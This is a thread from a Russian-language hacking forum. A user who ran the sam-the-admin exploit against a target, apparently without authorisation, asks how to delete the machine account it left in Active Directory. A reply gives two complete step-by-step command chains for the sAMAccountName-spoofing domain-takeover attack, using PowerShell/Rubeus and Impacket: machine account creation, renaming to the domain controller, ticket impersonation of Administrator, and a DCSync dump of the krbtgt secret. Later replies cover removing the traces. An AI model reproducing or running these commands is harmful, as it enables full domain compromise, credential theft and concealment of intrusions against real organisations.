• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc samtheadmin удалить юзера

Отслеживать
scoring0

scoring0

root@serv1:#
Premium
Регистрация
06.08.2019
Сообщения
179
Реакции
51
Депозит
0.00
Уважаемые, выручайте. Юзнул на таргете samtheadmin (https://github.com/WazeHell/sam-the-admin). Он мне создал юзера в AD и въебал его в группу Computers. Как сейчас его удалить?
Через rpcclient не канает:
Код: 
rpcclient $> deletedomuser SAMTHEADMIN-40$
result was NT_STATUS_ACCESS_DENIED
 
У меня никогда не было возможности работать с этим CVE, но, похоже, существует несколько способов его использования. Не знаю, видели ли вы это:

Код: 
# Create Machine Account
New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose
# Clear SPNs
Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose
# Request TGT
.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose
# Request S4U2self
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]

Или вот это:
(addcomputer, renameMachine, getTGT, getST, secretsdump являются частью сценариев Impackets а addspn от krbelayx)

Код: 
# 0. create a computer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
# 1. clear its SPNs
addspn.py --clear -t 'ControlledComputer$' -u 'domain\user' -p 'password' 'DomainController.domain.local'
# 2. rename the computer (computer -> DC)
renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
# 3. obtain a TGT
getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
# 4. reset the computer name
renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
# 5. obtain a service ticket with S4U2self by presenting the previous TGT
KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
# 6. DCSync by presenting the service ticket
KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'

Надеюсь, я понял, о чем вы спрашивали, не стесняйтесь спрашивать меня снова, если вам это нужно.
 
Последнее редактирование:
xiaolongbao сказал(а):
У меня никогда не было возможности работать с этим CVE, но, похоже, существует несколько способов его использования. Не знаю, видели ли вы это:

Код: 
# Create Machine Account
New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose
# Clear SPNs
Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose
# Request TGT
.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose
# Request S4U2self
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]

Или вот это:
(addcomputer, renameMachine, getTGT, getST, secretsdump являются частью сценариев Impackets а addspn от krbelayx)

Код: 
# 0. create a computer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
# 1. clear its SPNs
addspn.py --clear -t 'ControlledComputer$' -u 'domain\user' -p 'password' 'DomainController.domain.local'
# 2. rename the computer (computer -> DC)
renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
# 3. obtain a TGT
getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
# 4. reset the computer name
renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
# 5. obtain a service ticket with S4U2self by presenting the previous TGT
KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
# 6. DCSync by presenting the service ticket
KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'

Надеюсь, я понял, о чем вы спрашивали, не стесняйтесь спрашивать меня снова, если вам это нужно.
Я изучил всю библиотеку Impackets, и не нашел там метода для удаления пользователя, созданного через метод "Create Machine Account".
 
scoring0 сказал(а):
Я изучил всю библиотеку Impackets, и не нашел там метода для удаления пользователя, созданного через метод "Create Machine Account".
Пробовали ли вы использовать следующую команду Powershell?

Код: 
Remove-ADUser
 
xiaolongbao сказал(а):
Пробовали ли вы использовать следующую команду Powershell?
Код: 
Remove-ADUser
У меня нет доступа в powershell. У меня только ldap пользователь с ограниченным доступом в LDAP. Так же могу подключиться через rpcclient.
 
scoring0 сказал(а):
Уважаемые, выручайте. Юзнул на таргете samtheadmin (https://github.com/WazeHell/sam-the-admin). Он мне создал юзера в AD и въебал его в группу Computers. Как сейчас его удалить?
Через rpcclient не канает:
Код: 
rpcclient $> deletedomuser SAMTHEADMIN-40$
result was NT_STATUS_ACCESS_DENIED
Если обычный пользак может создать машинную учетку через MachineAccountQuote, то удалить он её уже не сможет.
Для удаления нужен привилегированный пользак.
 
rurk сказал(а):
Если обычный пользак может создать машинную учетку через MachineAccountQuote, то удалить он её уже не сможет.
Для удаления нужен привилегированный пользак.
Этого я и боялся...
Спасибо за ответ.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх